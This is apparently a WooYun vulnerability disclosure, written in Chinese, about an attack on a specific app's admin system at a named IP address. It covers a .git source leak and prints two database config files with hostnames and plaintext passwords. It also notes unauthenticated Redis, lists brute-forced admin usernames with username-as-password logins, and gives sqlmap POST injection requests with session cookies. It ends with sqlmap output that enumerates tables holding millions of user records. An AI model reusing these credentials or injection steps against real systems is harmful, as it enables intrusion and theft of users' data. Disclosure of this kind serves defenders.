WooYun.org

首先是git源码泄露
http://121.40.223.69:8028/.git/config
用李姐姐的git脚本下载下来源码

database.php
---------------------------------------
<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
|	['hostname'] The hostname of your database server.
|	['username'] The username used to connect to the database
|	['password'] The password used to connect to the database
|	['database'] The name of the database you want to connect to
|	['dbdriver'] The database type. ie: mysql.  Currently supported:
				 mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
|	['dbprefix'] You can add an optional prefix, which will be added
|				 to the table name when using the  Active Record class
|	['pconnect'] TRUE/FALSE - Whether to use a persistent connection
|	['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
|	['cache_on'] TRUE/FALSE - Enables/disables query caching
|	['cachedir'] The path to the folder where cache files should be stored
|	['char_set'] The character set used in communicating with the database
|	['dbcollat'] The character collation used in communicating with the database
|				 NOTE: For MySQL and MySQLi databases, this setting is only used
| 				 as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
|				 (and in table creation queries made with DB Forge).
| 				 There is an incompatibility in PHP with mysql_real_escape_string() which
| 				 can make your site vulnerable to SQL injection if you are using a
| 				 multi-byte character set and are running versions lower than these.
| 				 Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
|	['swap_pre'] A default table prefix that should be swapped with the dbprefix
|	['autoinit'] Whether or not to automatically initialize the database.
|	['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
|							- good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active.  By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = '120.55.130.50';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysql';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
$db['read']['hostname'] = '120.55.130.50';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysql';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */
-------------------------
databasebak.php
-------------------------------
<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
|	['hostname'] The hostname of your database server.
|	['username'] The username used to connect to the database
|	['password'] The password used to connect to the database
|	['database'] The name of the database you want to connect to
|	['dbdriver'] The database type. ie: mysql.  Currently supported:
				 mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
|	['dbprefix'] You can add an optional prefix, which will be added
|				 to the table name when using the  Active Record class
|	['pconnect'] TRUE/FALSE - Whether to use a persistent connection
|	['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
|	['cache_on'] TRUE/FALSE - Enables/disables query caching
|	['cachedir'] The path to the folder where cache files should be stored
|	['char_set'] The character set used in communicating with the database
|	['dbcollat'] The character collation used in communicating with the database
|				 NOTE: For MySQL and MySQLi databases, this setting is only used
| 				 as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
|				 (and in table creation queries made with DB Forge).
| 				 There is an incompatibility in PHP with mysql_real_escape_string() which
| 				 can make your site vulnerable to SQL injection if you are using a
| 				 multi-byte character set and are running versions lower than these.
| 				 Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
|	['swap_pre'] A default table prefix that should be swapped with the dbprefix
|	['autoinit'] Whether or not to automatically initialize the database.
|	['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
|							- good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active.  By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysqli';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
$db['read']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysqli';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;
/*活动激活的数据库 读写*/
$db['huodong_default']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_default']['username'] = 'crop_sys_admin';
$db['huodong_default']['password'] = 'yppcroprds2016';
$db['huodong_default']['database'] = 'ypp_cms_db';
$db['huodong_default']['dbdriver'] = 'mysqli';
$db['huodong_default']['dbprefix'] = '';
$db['huodong_default']['pconnect'] = TRUE;
$db['huodong_default']['db_debug'] = TRUE;
$db['huodong_default']['cache_on'] = FALSE;
$db['huodong_default']['cachedir'] = '';
$db['huodong_default']['char_set'] = 'utf8';
$db['huodong_default']['dbcollat'] = 'utf8_general_ci';
$db['huodong_default']['swap_pre'] = '';
$db['huodong_default']['autoinit'] = TRUE;
$db['huodong_default']['stricton'] = FALSE;
/*活动激活的数据库 读*/
$db['huodong_read']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_read']['username'] = 'crop_sys_admin';
$db['huodong_read']['password'] = 'yppcroprds2016';
$db['huodong_read']['database'] = 'ypp_cms_db';
$db['huodong_read']['dbdriver'] = 'mysqli';
$db['huodong_read']['dbprefix'] = '';
$db['huodong_read']['pconnect'] = TRUE;
$db['huodong_read']['db_debug'] = TRUE;
$db['huodong_read']['cache_on'] = FALSE;
$db['huodong_read']['cachedir'] = '';
$db['huodong_read']['char_set'] = 'utf8';
$db['huodong_read']['dbcollat'] = 'utf8_general_ci';
$db['huodong_read']['swap_pre'] = '';
$db['huodong_read']['autoinit'] = TRUE;
$db['huodong_read']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */

redis未授权访问
121.40.223.69:6379

然后找到管理系统 http://121.40.223.69:8028/admin/
爆破出5个用户名
chenyan 
zhanglin
zhangyong
guochao
liyongsheng
然后试试用户密码相同的  liyongsheng   liyongsheng guochao guochao 有2个用户

找了下后台sql注入 好多的 我就找了2个
post注入语法：sqlmap.py -r 1.txt --dbs   参数wangbano
-------------------post参数--------------------------------
POST /admin/pubwin_stores_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 98
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d2861bb11873a6c90460ef26416b6f89%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462990496%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D4bcb57eee7a61ab4f899d97f5db07424
pageNum=1&numPerPage=20&wangbano=1&store_name=1&server_version=1&can_recharge=&can_select_balance=
--------------------------另外一处----------参数 mobile-------------------- 
POST /admin/god_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 206
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221eae6a510bc7164581ec422a36287375%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462991222%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D681991a95831bb63fbe22bb5f789610c
pageNum=1&numPerPage=20&mobile=1&source=&isbind=&is_official=&price_begin=1&price_end=&god_company_id=&keyword=1&true_name=&gender=&status=&createtime_begin=2016-05-11&createtime_end=2016-05-19&city_name=11

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] ypp_app_test

Database: ypp_app_test
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| t_user_login                     | 4918627 |
| t_dongtai_reply                  | 3559021 |
| t_score_journal                  | 2950727 |
| t_recharge                       | 1722530 |
| t_notify                         | 1433701 |
| t_sms_log                        | 1269551 |
| t_god_score_log                  | 1092585 |
| t_platform_game_winner           | 1040977 |
| t_user_ext                       | 802812  |
| t_user                           | 801473  |
| t_sys_invite_code                | 772075  |
| t_wy_register                    | 641601  |
| t_coupon_detail                  | 638662  |
| t_user_journal                   | 488742  |
| t_sms_submail_log                | 478570  |
| t_user_month_login               | 470310  |
| t_dongtai                        | 428084  |
| t_dongtai_dashang                | 405641  |
| t_god_lovelog                    | 398673  |
| t_fin_alipayjournal_old          | 393343  |
| t_user_cash_journal              | 389924  |
| t_recharge_pomotion_users        | 327359  |
| t_play_order                     | 257786  |
| t_platform_game_winner_backup    | 256938  |
| t_admin_log                      | 250742  |
| t_user_photo                     | 234687  |
| t_staff_drink                    | 229784  |
| t_signin                         | 220205  |
| t_chat_log                       | 186966  |
| t_mobile_area                    | 149310  |
| t_god_apply_photo                | 129561  |
| t_play_response                  | 126662  |
| t_user_game                      | 111407  |
| t_god_journal                    | 109822  |
| t_user_oftenstore                | 94596   |
| t_play_order_rate                | 84686   |
| t_fin_alipayjournal              | 70690   |
| t_store_recharge_day_report      | 67199   |
| t_group_member                   | 63781   |
| t_god_cert                       | 62472   |
| t_god_apply                      | 54037   |
| t_fin_weixinjournal              | 48846   |
| t_biz_log                        | 48316   |
| t_user_invite                    | 28339   |
| t_god_items                      | 25889   |
| t_store_machine                  | 25241   |
| t_play_order_god_rate            | 24506   |
| t_user_count                     | 24095   |
| t_god_item_apply                 | 22043   |
| t_godgame_photo                  | 19752   |
| t_cash_give                      | 15052   |
| t_reserve                        | 14859   |
| t_god_jiesuan                    | 14262   |
| t_cash_get                       | 14107   |
| t_god_edit_apply                 | 13451   |
| t_bind_journal                   | 12344   |
| t_coupon_codes                   | 9311    |
| t_god                            | 9259    |
| t_god_order_day_log              | 8445    |
| t_user_auth                      | 8151    |
| t_jubao                          | 7922    |
| t_play_order_day_report          | 7280    |
| t_withdraw                       | 6647    |
| t_god_game                       | 6590    |
| t_dongtai_dashang_day_report     | 6038    |
| t_god_search                     | 5982    |
| t_bind_journal_day_report        | 5577    |
| t_group                          | 5017    |
| t_user_alias                     | 4613    |
| t_group_invitelog                | 4476    |
| t_user_poi                       | 4013    |
| tmp_god_ids                      | 3909    |
| t_game_winner_day_report         | 3415    |
| t_bind_journal_jiaoban_report    | 3219    |
| t_shenzhi_code                   | 3000    |
| t_activity_member                | 2947    |
| t_chat_check                     | 2805    |
| t_admin_role_function            | 2638    |
| test_code                        | 2231    |
| t_biz_city_cat_price             | 2186    |
| t_dongtai_dashang_jiaoban_report | 2071    |
| t_group_photo                    | 2035    |
| t_user_vip                       | 2015    |
| t_store_recharge_jiaoban_report  | 1861    |
| t_tg_gudu                        | 1825    |
| t_game_winner_jiaoban_report     | 1741    |
| t_user_journal_jiaoban_report    | 1741    |
| t_fin_changelog                  | 1589    |
| t_suggestion                     | 1581    |
| t_store_region                   | 1541    |
| tmp_dongtai                      | 1182    |
| t_group_poi                      | 1065    |
| t_store                          | 753     |
| t_god_100                        | 721     |
| t_activity                       | 677     |
| t_god_recommand                  | 525     |
| t_game_partition                 | 524     |
| t_biz_city_cat                   | 440     |
| t_activity_reply                 | 434     |
| t_sys_citys                      | 407     |
| tmp_gods                         | 381     |
| t_pubwin_stores                  | 373     |
| t_city                           | 372     |
| t_admin_function                 | 371     |
| t_play_order_shensu              | 371     |
| t_ypp_money                      | 304     |
| t_game_duanwei                   | 296     |
| t_manual_recharge_to_ypp         | 245     |
| t_apilist                        | 241     |
| t_gym                            | 237     |
| t_store_manager                  | 227     |
| t_coupon                         | 180     |
| t_mall_order                     | 128     |
| t_bizcircle                      | 122     |
| t_god_city                       | 95      |
| t_cat_tag                        | 90      |
| t_dongtai_keyword                | 75      |
| t_game_weizhi                    | 73      |
| t_playorder_recharge_log         | 64      |
| t_god_eidt_price_apply           | 51      |
| t_admin_staff                    | 49      |
| t_banner                         | 39      |
| t_user_vip_hours                 | 35      |
| t_cat_level                      | 32      |
| t_pubwin_region                  | 31      |
| t_download_ypp                   | 30      |
| t_dictionary                     | 29      |
| t_coupon_laplus                  | 27      |
| t_user_black                     | 25      |
| t_tuiguang_qudao                 | 23      |
| t_user_subscribe                 | 22      |
| t_admin_role                     | 21      |
| t_biz_cat                        | 19      |
| t_sysmessage                     | 19      |
| t_biz_cat_price                  | 18      |
| t_region                         | 15      |
| t_game                           | 13      |
| t_biz_cert                       | 12      |
| t_recharge_promotion_detail      | 12      |
| t_bank                           | 10      |
| t_search_hotwords                | 10      |
| t_biz_navigation                 | 9       |
| t_recharge_promotion             | 9       |
| t_wy_shop_region                 | 9       |
| t_huodong_item                   | 8       |
| t_user_vip_coupon                | 8       |
| t_compaign                       | 7       |
| t_jubao_reason                   | 7       |
| t_act_prize_config               | 6       |
| t_complain_custome               | 6       |
| t_quiz_items                     | 6       |
| t_version                        | 6       |
| t_god_company                    | 5       |
| t_god_guides                     | 5       |
| t_user_attach                    | 5       |
| t_user_vip_config                | 4       |
| t_chat_warn                      | 3       |
| t_coupon_user                    | 3       |
| t_hobby                          | 3       |
| t_mall_product                   | 3       |
| t_quiz                           | 3       |
| t_site                           | 3       |
| t_ad                             | 2       |
| t_city_new_cat_img               | 2       |
| t_data_version                   | 2       |
| t_drink                          | 2       |
| t_home_recommand                 | 2       |
| t_huodong                        | 2       |
| t_act_qualifications_config      | 1       |
| t_app_setting                    | 1       |
| t_god_cert_edit_apply            | 1       |
| t_groupno                        | 1       |
| t_platform_game                  | 1       |
| t_pushmessage                    | 1       |
+----------------------------------+---------+